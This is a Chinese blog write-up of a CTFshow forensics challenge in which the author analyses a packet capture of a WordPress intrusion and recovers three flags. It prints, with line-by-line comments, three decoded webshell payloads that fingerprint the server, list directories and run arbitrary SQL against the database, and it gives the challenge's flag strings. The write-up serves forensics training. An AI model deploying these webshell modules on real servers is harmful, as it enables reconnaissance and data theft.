CTFshow——电子取证

最新推荐文章于 2024-07-24 09:32:41 发布
最新推荐文章于 2024-07-24 09:32:41 发布
阅读量232 收藏 5
点赞数 1
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/137523891
版权

套的签到题

打开先用http协议过滤一下

发现在同一时间访问多个目录

可能是在目录扫描

给他扫到了secret.zip

看看是什么

用010打开

删除多余部分

得到一堆php文件

flag1

然后继续返回小鲨鱼看看

一直在a.php这里穿参

打开他的脚本

url解密一下

一步一步看看他在干啥

<?php

// 禁止显示 PHP 错误信息
@ini_set("display_errors", "0");

// 设置脚本执行时间限制为无限制
@set_time_limit(0);

// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
    return $out;
}

// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
    // 获取输出缓冲区中的内容
    $output = ob_get_contents();
    ob_end_clean(); // 清空输出缓冲区

    // 输出处理后的内容
    echo "81c89"; // 输出前缀
    echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
    echo "292e6ed50f"; // 输出后缀
}

// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();

try {
    // 获取服务器和环境的信息
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "")
        $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}    "; // 服务器路径
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) {
            if (is_dir("{$L}:")) {
                $R .= "{$L}:"; // Windows 盘符
            }
        }
    } else {
        $R .= "/"; // Linux 根路径
    }
    $R .= "    ";

    // 获取当前用户信息
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();

    // 将服务器信息、操作系统信息、当前用户信息拼接到一起
    $R .= php_uname(); // 操作系统信息
    $R .= "    {$s}";

    // 输出获取到的信息
    echo $R;
} catch (Exception $e) {
    // 如果有异常,输出错误信息
    echo "ERROR://" . $e->getMessage();
}

// 处理并输出获取到的信息
asoutput();

// 终止脚本的执行
die();

?>

读取服务区 操作系统 当前用户信息

<?php

// 禁止显示 PHP 错误信息
$mumuzi = @ini_set("display_errors", "0");

// 设置脚本执行时间限制为无限制
@set_time_limit(0);

// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
    return $out;
}

// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
    // 获取输出缓冲区中的内容
    $output = ob_get_contents();
    ob_end_clean(); // 清空输出缓冲区

    // 输出处理后的内容
    echo "8ae19f4d6a0e"; // 输出前缀
    echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
    echo "e5fb750541"; // 输出后缀
}

// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();

try {
    // 解码 POST 请求中的参数,获取目录路径
    $D = base64_decode(substr($_POST["w1e23a5b202d16"], 2));
    $F = @opendir($D); // 打开目录句柄

    // 如果目录不存在或无权限,则输出错误信息
    if ($F == NULL) {
        echo("ERROR:// Path Not Found Or No Permission!");
    } else {
        $M = NULL; // 存储子目录信息
        $L = NULL; // 存储文件信息
        
        // 遍历目录中的文件和子目录
        while ($N = @readdir($F)) {
            $P = $D . $N; // 文件或子目录的完整路径
            $T = @date("Y-m-d H:i:s", @filemtime($P)); // 文件或子目录的修改时间
            @$E = substr(base_convert(@fileperms($P), 10, 8), -4); // 文件或子目录的权限
            $R = "    " . $T . "    " . @filesize($P) . "    " . $E . "
"; // 构建文件或子目录的信息
            
            // 如果是子目录,将信息存储到 $M 中
            if (@is_dir($P))
                $M .= $N . "/" . $R;
            // 如果是文件,将信息存储到 $L 中
            else
                $L .= $N . $R;
        }
        
        // 输出子目录信息和文件信息
        echo $M . $L;
        @closedir($F); // 关闭目录句柄
    }
} catch (Exception $e) {
    // 如果有异常,输出错误信息
    echo "ERROR://" . $e->getMessage();
}

// 处理并输出获取到的信息
asoutput();

// 终止脚本的执行
die();

?>

读取文件

一步一步的

也是读到我们家flag了

base64解码一下

得到第一段flag

注意这里是脚本里加的前缀

p4rt1_y00_you_crack_my_wpweb

flag2

继续往下看

同样的翻译脚本

<?php

// 定义数据库相关的一些信息
$ba78d60a6b259c = "utf8"; // 字符集
$efad7905bff72d = "wordpress"; // 数据库名

// 禁止显示 PHP 错误信息
$mumuzi = @ini_set("display_errors", "0");

// 设置脚本执行时间限制为无限制
@set_time_limit(0);

// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
    return $out;
}

// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
    // 获取输出缓冲区中的内容
    $output = ob_get_contents();
    ob_end_clean(); // 清空输出缓冲区

    // 输出处理后的内容
    echo "5ab71b5d25dc"; // 输出前缀
    echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
    echo "55faf75fe7c2"; // 输出后缀
}

// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();

try {
    // 检查是否启用了 Magic Quotes GPC
    $m = get_magic_quotes_gpc();
    
    // 获取 POST 请求中的参数
    $hst = $m ? stripslashes($_POST["ze9a61efed8a8e"]) : $_POST["ze9a61efed8a8e"]; // 主机
    $usr = $m ? stripslashes($_POST["q5d8f0d64504b2"]) : $_POST["q5d8f0d64504b2"]; // 用户名
    $pwd = $m ? stripslashes($_POST["vd4276a0d86cf7"]) : $_POST["vd4276a0d86cf7"]; // 密码
    $dbn = $m ? stripslashes($_POST["efad7905bff72d"]) : $_POST["efad7905bff72d"]; // 数据库名
    $sql = base64_decode($_POST["n5a24bdf78868b"]); // SQL 查询语句

    // 解析主机和端口
    $port = explode(":", $hst)[1]; // 端口
    $hst = explode(":", $hst)[0]; // 主机

    // 连接数据库服务器
    $T = @mysqli_connect($hst, $usr, $pwd, "", $port);
    @mysqli_query($T, "SET NAMES $_POST[ba78d60a6b259c]"); // 设置字符集
    @mysqli_select_db($T, $dbn); // 选择数据库

    // 执行 SQL 查询
    $q = @mysqli_query($T, $sql);

    // 检查查询结果是否为布尔值
    if (is_bool($q)) {
        echo ("Status\t|\t" . ($q ? "True" : "False") . "\t|\t\n"); // 输出查询状态
    } else {
        $i = 0;
        while ($col = @mysqli_fetch_field($q)) {
            echo ($col->name . "\t|\t"); // 输出列名
            $i++;
        }
        echo ("\n");
        while ($rs = @mysqli_fetch_row($q)) {
            for ($c = 0; $c < $i; $c++) {
                echo (base64_encode(trim($rs[$c]))); // 输出查询结果(经过 base64 编码)
                echo ("\t|\t");
            }
            echo ("\n");
        }
    }

    @mysqli_close($T); // 关闭数据库连接
} catch (Exception $e) {
    // 如果有异常,输出错误信息
    echo "ERROR://" . $e->getMessage();
}

// 处理并输出获取到的信息
asoutput();

// 终止脚本的执行
die();

?>

他在读取数据库的内容

找啊找

也是找到我们家flag了

now_you_can_submit_flag2

flag3

然后往下翻

发现他一直在尝试登陆login.php

最后也是给我们家hacker登陆进去了

然后在后面他post的文件里面找到了内容就是flag3

阿呆不呆@qq
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ctfshow 2021摆烂杯] FORENSICS部分 writeup
ShenZ的博客
01-03 3095
[ctfshow 2021摆烂杯] FORENSICS部分 writeup 套的签到题 第一段flag 第二段flag 第三段flag JiaJia-CP-1 JiaJia-CP-2 JiaJia-CP-3 JiaJia-PC-1 JiaJia-PC-2 JiaJia-PC-3
CTFShow-电子取证篇Writeup
Aluxian_的博客
05-18 2814
CTFShow-电子取证篇Writeup。
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 580
ctfshow-web入门-信息收集wp
网络安全最全CTFShow-电子取证篇Writeup_ctfshow 电子取证,2024年最新最新网络安全面试合集
2401_84252820的博客
05-14 948
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【CTFshow 电子取证】 JiaJia-CP-1-2-3(图文详解)
jiming_wue的博客
02-23 1359
【CTFshow 电子取证】 JiaJia-CP-1-2-3 使用Volatility 2.6 对题目中的内存镜像进行内存分析取证。
【CTFshow 电子取证】 JiaJia-PC-1-2-3(图文详解)
jiming_wue的博客
02-19 1814
【CTFshow 电子取证】 JiaJia-PC-1-2-3 通过FTK Imager 和 VMware工具实现系统镜像的动态仿真,从中获取我们想要的信息
ctfshow 摆烂杯 writeup
mumuzi的博客
12-26 3610
ctfshow摆烂杯 writeup
电子取证应用研究综述
05-06
近年来,电子数据取证对案件侦破起着重要的作用,由于电子数据具有易失性、易破坏性等特点,需要取证人员具备专业的电子取证技术和方法,才能最后分析出有用的证据,保证案件的真实性和客观性,详细分析三种取证技术...
美亚杯全国2018第四届电子数据取证竞赛-个人赛
05-02
美亚杯全国2018第四届电子数据取证竞赛-个人赛 电子取证竞赛是测试电子取证专业人员的技能和技术的竞赛,本竞赛旨在提高电子取证技术的应用和普及。 本竞赛包括了多个题目,涵盖了电子取证的多个方面,包括MD5...
计算机电子数据取证总结
06-07
计算机电子数据取证是信息技术与法律交叉领域的重要组成部分,主要用于调查和分析数字设备中的电子数据,以确定事实真相或法律证据。在现代社会,大量的信息都存储在计算机和其他电子设备中,因此,掌握有效的取证...
CAcup.md复盘长安杯电子取证大赛
10-25
2021年长安杯电子取证大赛第一部分,第二部分复盘
数据库取证工具SQLiteSpy
01-19
数据库取证是电子取证的一个重要分支,它涉及到对存储在数据库中的数据进行收集、分析和解释,以用于法律或调查目的。SQLiteSpy是一款优秀的数据库取证工具,尤其适用于处理SQLite数据库格式,这是一种轻量级且广泛...
ctfshow中Misc入门WP(超级全)
m0_46625346的博客
07-26 5798
misc42 misc43 提示:错误中隐藏着通往正确答案的道路 猜测与crc错误有关。 利用PCRT提取 PCRT:一款自动化检测修复PNG损坏的取证工具 可以在kali中安装PCRT:git clone https://github.com/sherlly/PCRT.git 然后 python PCRT.py -y -v -i misc44.png > 666.txt 把错误的code提出来用hex转字符 将这些提取出来,然后转16进制就可以。 E59387E5 93A62E63 7466736
2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限
weixin_33711647的博客
06-26 569
2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 ————————CONTENTS———————— 一.Webshell原理 1.什么是WebShell 2.WebShell的特点 二.渗透工具简介 1.中国菜刀 2.御剑后台扫描工具 三.web应用程序配置 四.练习:利用DVWA文件上传漏洞获取WebShell权限 五.中国菜刀原理剖析 1.目...
CTFSHOW-misc
Makabakahaha的博客
02-03 1219
ctfshow的misc做题记录
NepCTF 2022 MISC <签到题>(极限套娃)
GSflyy的博客
07-19 2681
即便身处困境,也别倒在黎明之前
【CTF整理】电子取证之Easy_dump(18护网杯)
SunnyCat
06-18 7008
目录电子取证之Easy_dump(18护网杯)资源和连接正文:0x010x020x030x040x050x060x070x080x090x100x110x12总结: 电子取证之Easy_dump(18护网杯) 资源和连接 原题资源:https://pan.baidu.com/s/1z73M2MRr6W6AfM57lomF-w 提取码:1tf5 声明:本题的解法众多,我在重温这道题的时候也是借鉴了很多大佬的文章,但是本篇文章的内容都是自己所做所写,仅供大家技术交流。 参考链接: 2018护网杯——easy_d
有意思的签到题集合~~
1900的博客
10-24 1549
题目来源各处都有,难度都是水题难度,但是又不是单纯模拟,有点意思的 No.1 牛客练习赛29A 思路:所有的正数都从1号位置出,所有的负数都不变,倒着来从自己的位置出去。 代码 #include&lt;stdio.h&gt; #include&lt;iostream&gt; #include&lt;algorithm&gt; #include&lt;string.h&gt; usi...
47、PHP实现机器人的运动范围
最新发布
weixin_44010641的博客
07-24 824
地上有一个m行和n列的方格。一个机器人从坐标0,0的格子开始移动,每一次只能向左,右,上,下四个方向移动一格,但是不能进入行坐标和列坐标的数位之和大于k的格子。但是,它不能进入方格(35,38),因为3+5+3+8 = 19。请问该机器人能够达到多少个格子?当k为18时,机器人能够进入方格(35,37),因为3+5+3+7 = 18。
ctfshow web 电子取证
08-21
根据提供的引用内容,我了解到在ctfshow web电子取证中,分别得到了三个flag。的flag是ctfshow{e6ad8304cdb562971999b476d8922219},的flag是ctfshow{af5b5e411813eafd8dc2311df30b394e},的flag是ctfshow{5526710eb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值